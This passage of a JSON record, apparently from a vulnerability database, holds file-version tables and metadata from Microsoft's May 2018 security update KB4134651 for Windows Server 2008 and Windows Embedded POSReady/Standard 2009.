applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>192,512</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>77,824</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>270,336</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>192,512</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>77,824</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>266,240</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>172,032</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>86,016</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>241,664</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>172,032</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>73,728</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>241,664</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>167,936</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>69,632</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>131,072</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>98,304</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>40,960</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>135,168</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>98,304</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>45,056</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll</td><td>6.0.6002.24367</td><td>620,544</td><td>28-Apr-2018</td><td>01:40</td><td>x86</td><td>Not applicable</td></tr><tr><td>Auditpol.exe</td><td>6.0.6002.24367</td><td>41,984</td><td>28-Apr-2018</td><td>01:43</td><td>x86</td><td>Not applicable</td></tr><tr><td>Msaudite.dll</td><td>6.0.6002.24367</td><td>146,432</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Msobjs.dll</td><td>6.0.6002.24367</td><td>58,880</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr></tbody></table></td></tr></tbody></table><p><br/><strong>Windows Embedded POSReady 2009 and Windows Embedded Standard 2009 file information</strong></p><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-heading=\"\">For all supported x86-based versions</td></tr><tr><td faq-panel-body=\"\"><table class=\"table\"><tbody><tr><td><strong class=\"sbody-strong\">File name</strong></td><td><strong class=\"sbody-strong\">File version</strong></td><td><strong class=\"sbody-strong\">File size</strong></td><td><strong class=\"sbody-strong\">Date</strong></td><td><strong class=\"sbody-strong\">Time</strong></td><td><strong class=\"sbody-strong\">Platform</strong></td><td><strong class=\"sbody-strong\">SP requirement</strong></td><td><strong class=\"sbody-strong\">Service branch</strong></td></tr><tr><td>Kernel32.dll</td><td>5.1.2600.7475</td><td>993,792</td><td>22-Apr-2018</td><td>21:28</td><td>x86</td><td>SP3</td><td>SP3QFE</td></tr><tr><td>Ntdll.dll</td><td>5.1.2600.7475</td><td>720,384</td><td>22-Apr-2018</td><td>21:28</td><td>x86</td><td>SP3</td><td>SP3QFE</td></tr><tr><td>Ole32.dll</td><td>5.1.2600.7475</td><td>1,293,312</td><td>22-Apr-2018</td><td>06:28</td><td>x86</td><td>SP3</td><td>SP3QFE</td></tr><tr><td>Oleaut32.dll</td><td>5.1.2600.7475</td><td>546,816</td><td>22-Apr-2018</td><td>21:28</td><td>x86</td><td>SP3</td><td>SP3QFE</td></tr><tr><td>Rpcss.dll</td><td>5.1.2600.7475</td><td>401,408</td><td>22-Apr-2018</td><td>21:28</td><td>x86</td><td>SP3</td><td>SP3QFE</td></tr><tr><td>Updspapi.dll</td><td>6.3.13.0</td><td>382,840</td><td>01-Feb-2018</td><td>21:28</td><td>x86</td><td>None</td><td>Not applicable</td></tr></tbody></table></td></tr></tbody></table><p>\u00a0</p></body></html>", "edition": 2, "modified": "2018-05-08T17:09:28", "id": "KB4134651", "href": "https://support.microsoft.com/en-us/help/4134651/", "published": "2018-05-08T00:00:00", "title": "Description of the security update for vulnerabilities in Windows Server 2008, Windows Embedded POSReady 2009, and Windows Embedded Standard 2009: May 08, 2018", "type": "mskb", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}]}